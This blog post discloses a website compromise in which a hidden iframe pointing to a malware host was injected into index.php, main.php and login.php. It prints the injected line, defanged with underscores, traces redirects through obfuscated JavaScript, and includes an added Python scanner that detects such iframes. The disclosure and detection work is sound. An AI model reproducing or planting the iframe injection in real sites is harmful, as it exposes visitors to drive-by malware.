Geekness – closer to the world

Geeky at the Lake of Zurich

Life-Tablets.cn / neiron2008.com : How They Distribute Malware On Your Website

Notice: This is a developing story! Updates will be added as they occur. Help others and report your findings in the comments below! And check your websites for malicious injections.

As previously reported, some of my websites got hacked and broken into. The evil people that did it use a sneaky technique to hide their approach.

Here is how they did it and what you should look for.
Check your “index.php”, “main.php” and “login.php” files for the following line of code:

<iframe src="http://li____fe-tab____lets.cn/t___ds/index.php" width=0 height=0 style="visibility:hidden;position:absolute"></iframe>

Remove all underscores “_”. But consider yourself warned! The page above does no good to you, your browser or your computer!
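The check above can be automated. The following is an added example, not code from the original post: it walks a web root, opens the file names listed above, and flags any iframe tag that has a remote src and is hidden through zero width/height or CSS. The `display:none` marker and the `injected.example` sample files are assumptions constructed for illustration.

```python
import re
import sys
import tempfile
from pathlib import Path

# File names the post says to check (assumption: extend this set for your own site).
TARGET_NAMES = {"index.php", "main.php", "login.php"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?(https?://[^"'\s>]+)""", re.IGNORECASE)
# Markers of an invisible frame: zero width/height or CSS hiding.
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE,
)

def find_hidden_iframes(text):
    """Return (line_no, src_url) for each iframe with a remote src and a hiding marker."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        if src and HIDDEN_RE.search(tag):
            hits.append((text.count("\n", 0, m.start()) + 1, src.group(1)))
    return hits

def scan_webroot(root, names=TARGET_NAMES):
    """Walk root and report hits in .php files whose name is in names."""
    report = {}
    for path in Path(root).rglob("*.php"):
        if path.name in names:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

def demo():
    """Constructed sample: one file with an injected hidden iframe, one with a harmless local frame."""
    injected = ('<?php echo "hi"; ?>\n<iframe src="http://injected.example/x/index.php" '
                'width=0 height=0 style="visibility:hidden;position:absolute"></iframe>\n')
    with tempfile.TemporaryDirectory() as d:
        Path(d, "index.php").write_text(injected)
        Path(d, "login.php").write_text('<?php ?>\n<iframe src="/local/help.html" width=300></iframe>\n')
        return sorted(h for hits in scan_webroot(d).values() for h in hits)

if __name__ == "__main__":
    result = scan_webroot(sys.argv[1]) if len(sys.argv) > 1 else demo()
    print(result)
```

Run it with the path to your web root as the only argument; with no argument it scans the constructed sample files.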

Next, I inspected the linked file that gets included by the iframe-tag. First it redirects a couple of times before you only see a 404 error. But this 404 is faked. The page has some nasty content:

Important note: After the redirects, you are no longer on life-tablets.net, but on neiron2008.com !!

After de-scrambling the JavaScript code, you can see that the iframes declared above the code are being set to a URL:

Following the new targets, you get another HTML page with JavaScript. But now all the code is escaped. The file is 14.4 KB big. After unescaping the code (HTML & JavaScript Encoder/Decoder) I got some ugly code with, once again, unreadable functions.
However, I found another URL in the code: zsdbkhtlur.com
But this domain is not and was not registered. Maybe somebody is in an early planning stage?

Neiron2008.com was registered on June 26, 2008, 5 days after somebody injected the code in my websites. The domain owner wants to hide, so the registration is proxied by PrivacyProtect.org.

If you have any more information or other JavaScript code, please comment below and warn others!
